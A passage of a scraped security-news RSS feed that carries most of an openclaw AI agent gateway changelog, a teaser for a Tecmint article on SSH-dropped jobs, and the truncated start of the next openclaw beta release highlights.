<p>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</p>
</li>
<li>
<p>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</p>
</li>
<li>
<p>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</p>
</li>
<li>
<p>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</p>
</li>
<li>
<p>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</p>
</li>
<li>
<p>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</p>
</li>
<li>
<p>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</p>
</li>
<li>
<p>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</p>
</li>
<li>
<p>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</p>
</li>
<li>
<p>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</p>
</li>
<li>
<p>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</p>
</li>
<li>
<p>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</p>
</li>
<li>
<p>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</p>
</li>
<li>
<p>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</p>
</li>
<li>
<p>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</p>
</li>
<li>
<p>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</p>
</li>
<li>
<p>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</p>
</li>
<li>
<p>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</p>
</li>
<li>
<p>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</p>
</li>
<li>
<p>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</p>
</li>
<li>
<p>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</p>
</li>
<li>
<p>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</p>
</li>
<li>
<p>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</p>
</li>
<li>
<p>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</p>
</li>
<li>
<p>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</p>
</li>
<li>
<p>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</p>
</li>
<li>
<p>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</p>
</li>
<li>
<p>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</p>
</li>
<li>
<p>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</p>
</li>
<li>
<p>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</p>
</li>
<li>
<p>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[SSH Dropped and Killed Your Job? Here’s the Fix]]></title>
<description><![CDATA[The post SSH Dropped and Killed Your Job? Here’s the Fix first appeared on Tecmint: Linux Howtos, Tutorials & Guides .You’ve been running a long rsync job or a Python script on a remote server only to watch it die
The post SSH Dropped and Killed Your Job? Here’s the Fix first appeared on Tecmint:...]]></description>
<link>https://tsecurity.de/de/3479595/unix-server/ssh-dropped-and-killed-your-job-heres-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3479595/unix-server/ssh-dropped-and-killed-your-job-heres-the-fix/</guid>
<pubDate>Fri, 01 May 2026 08:00:57 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The post <a href="https://www.tecmint.com/keep-linux-commands-running-after-logout/">SSH Dropped and Killed Your Job? Here’s the Fix</a> first appeared on <a href="https://www.tecmint.com/">Tecmint: Linux Howtos, Tutorials &amp; Guides</a> .<p>You’ve been running a long rsync job or a Python script on a remote server only to watch it die</p>
The post <a href="https://www.tecmint.com/keep-linux-commands-running-after-logout/">SSH Dropped and Killed Your Job? Here’s the Fix</a> first appeared on <a href="https://www.tecmint.com/">Tecmint: Linux Howtos, Tutorials &amp; Guides</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.29-beta.3]]></title>
<description><![CDATA[2026.4.29
Highlights

Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks @vincentkoc, @scoootscooob, @samzong, and @vignesh07.
Memory grows into a peo...]]></description>
<link>https://tsecurity.de/de/3478646/downloads/openclaw-2026429-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3478646/downloads/openclaw-2026429-beta3/</guid>
<pubDate>Thu, 30 Apr 2026 20:46:26 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.29</h2>
<h3>Highlights</h3>
<ul>
<li>Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Memory grows into a people-aware wiki with provenance views, per-conversation Active Memory filters, partial recall on timeout, and bounded REM preview diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Provider/model coverage expands with NVIDIA onboarding/catalogs plus faster manifest-backed model/auth paths, Bedrock Opus 4.7 thinking parity, and safer Codex/OpenAI-compatible replay and streaming behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LyHug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LyHug">@LyHug</a>.</li>
<li>Gateway and packaged-plugin reliability focuses on slow-host startup, reusable model catalogs, event-loop readiness diagnostics, runtime-dependency repair, stale-session recovery, and version-scoped update caches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" 